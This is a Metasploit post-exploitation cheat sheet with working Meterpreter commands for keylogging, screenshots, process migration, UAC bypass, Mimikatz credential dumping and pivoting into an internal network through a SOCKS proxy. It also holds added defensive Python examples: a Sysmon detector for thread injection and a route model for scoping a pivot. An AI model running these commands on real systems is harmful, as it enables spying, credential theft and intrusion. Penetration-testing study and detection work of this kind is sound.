Post Exploitation

Core Features

Take a screenshot of the compromised desktop:

meterpreter > screenshot

Start a keylogger:

meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

Migrating Processes

When we compromise a host, our Meterpreter payload runs inside the process of the application we exploited. If the victim closes that process, our access to the machine is lost as well.

Using the migrate command, we can move Meterpreter's execution into a different process. To do this, first run ps to list the running processes, pick a long-lived one such as explorer.exe, and issue migrate with its PID:

meterpreter > ps
meterpreter > migrate <explorer.exe_id>

Alternatively, set an AutoRunScript on the handler before running the exploit, so that Meterpreter migrates automatically as soon as the session opens:

msf6 exploit(multi/handler) > set AutoRunScript post/windows/manage/migrate
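Migration works by creating a thread in another process, which is exactly the cross-process activity a defender can watch for. The following is an added example, not part of the original page or of Metasploit: a small check over constructed Sysmon-style Event ID 8 (CreateRemoteThread) records that flags remote threads created by an unexpected source, and calls out the case where the target is a process such as explorer.exe. The allowlist and the sample events are assumptions for illustration.

```python
"""Flag cross-process thread creation that looks like Meterpreter migration.

Added example (not from the page or from Metasploit). The events below are
constructed Sysmon-style Event ID 8 records reduced to the fields the check uses.
"""

# Source images that legitimately create threads in other processes.
# Constructed allowlist; in practice this is tuned per environment.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

# Targets where an injected thread is a high-value finding (explorer.exe is
# the one the page uses as a migration target).
SENSITIVE_TARGETS = {"explorer.exe", "lsass.exe", "svchost.exe", "winlogon.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_remote_threads(events: list[dict]) -> list[tuple[dict, str]]:
    """Return (event, reason) for each Event ID 8 that looks like injection.

    Threads a process creates in itself and threads from allowlisted system
    binaries are ignored; everything else is reported, with a stronger reason
    when the target is a sensitive process.
    """
    findings = []
    for ev in events:
        if ev.get("EventID") != 8:
            continue  # only CreateRemoteThread records matter here
        if ev["SourceProcessId"] == ev["TargetProcessId"]:
            continue  # a thread in its own process is not injection
        if ev["SourceImage"].lower() in ALLOWED_SOURCES:
            continue
        reason = "remote thread from unexpected source"
        if basename(ev["TargetImage"]) in SENSITIVE_TARGETS:
            reason += " into sensitive process"
        findings.append((ev, reason))
    return findings


# Constructed sample events: one benign system thread, one that resembles
# an unknown binary migrating into explorer.exe, and one unrelated record.
SAMPLE_EVENTS = [
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "SourceProcessId": 520, "TargetImage": r"C:\Windows\explorer.exe",
     "TargetProcessId": 3120},
    {"EventID": 8, "SourceImage": r"C:\Users\alice\Downloads\update.exe",
     "SourceProcessId": 4488, "TargetImage": r"C:\Windows\explorer.exe",
     "TargetProcessId": 3120},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ProcessId": 5000},
]

if __name__ == "__main__":
    for ev, reason in flag_remote_threads(SAMPLE_EVENTS):
        print(f"{reason}: {ev['SourceImage']} -> {ev['TargetImage']}")
```

The check is deliberately narrow: it keys on the source/target pair rather than on process names alone, because after a successful migration the Meterpreter traffic is carried by a trusted-looking process and the only trace of the move is this thread-creation event.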

Modules

Bypass UAC:

msf6 > use exploit/windows/local/bypassuac_injection_winsxs

PowerShell:

meterpreter > load powershell
meterpreter > powershell_execute "$PSVersionTable.PSVersion"

Mimikatz:

meterpreter > load kiwi
meterpreter > getsystem
meterpreter > creds_msv

Pivoting

Enumerate network interfaces:

C:\Windows\system32>ipconfig

ipconfig shows two network interfaces. We are on 192.168.214.10 and we want to pivot to 172.16.214.10, which sits on the second interface's network. Use autoroute to add a route to that network through our session:

msf6 > use multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 1
msf6 post(multi/manage/autoroute) > run

Use auxiliary/server/socks_proxy to start a local SOCKS proxy that forwards through the routed session:

msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 4a
msf6 auxiliary(server/socks_proxy) > run

Configure proxychains at /etc/proxychains4.conf to point at the SOCKS proxy.

Now we can prefix commands with proxychains to send their traffic through the pivot. For example:

proxychains rdesktop 172.16.214.5
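What autoroute and the SOCKS proxy do between them is a routing decision: each destination address is matched against the routes added for the session, and matching traffic is forwarded through that session while everything else goes out directly. The following added example (not part of the original page or of Metasploit) models that lookup over the two interfaces described above; the /24 netmasks and the session number are assumptions, since the page does not state them. A defender reviewing a compromised host can use the same computation to enumerate which internal networks became reachable through it.

```python
"""Model of the route table a pivot session adds and how destinations are resolved.

Added example, not Metasploit's own code. Interfaces are constructed from the
ipconfig output the page describes; the /24 masks are assumed.
"""
import ipaddress
from typing import Optional

# Constructed interface list of the compromised host (address, netmask).
INTERFACES = [
    ("192.168.214.10", "255.255.255.0"),  # the network we are already on
    ("172.16.214.10", "255.255.255.0"),   # the internal network behind the host
]


def subnet_of(address: str, netmask: str) -> ipaddress.IPv4Network:
    """Network an interface belongs to, e.g. 172.16.214.10/24 -> 172.16.214.0/24."""
    return ipaddress.ip_network(f"{address}/{netmask}", strict=False)


def build_routes(interfaces, session_id: int, direct_networks=()):
    """Simplified autoroute: one route per interface subnet through the session.

    Networks we already reach directly (our own side) get no route, so that
    traffic to them is not needlessly sent through the pivot.
    """
    direct = {ipaddress.ip_network(n) for n in direct_networks}
    routes = []
    for address, netmask in interfaces:
        net = subnet_of(address, netmask)
        if net in direct:
            continue
        routes.append((net, session_id))
    return routes


def resolve_session(routes, destination: str) -> Optional[int]:
    """Longest-prefix match. Returns the session id that carries traffic to
    destination, or None when it should go out directly."""
    dst = ipaddress.ip_address(destination)
    best = None
    for net, session_id in routes:
        if dst in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, session_id)
    return best[1] if best else None


def reachable_networks(routes) -> list[str]:
    """Which networks a pivot exposes; useful when scoping what a compromised
    host could have been used to reach."""
    return sorted(str(net) for net, _ in routes)


if __name__ == "__main__":
    our_side = subnet_of("192.168.214.10", "255.255.255.0")
    routes = build_routes(INTERFACES, session_id=1, direct_networks=[our_side])
    for dst in ("172.16.214.5", "192.168.214.20", "10.0.0.1"):
        via = resolve_session(routes, dst)
        print(f"{dst:16} -> {'session ' + str(via) if via else 'direct'}")
```

With the constructed interfaces, 172.16.214.5 (the rdesktop target above) resolves to session 1, while addresses on our own network and on the internet are left to the normal routing table.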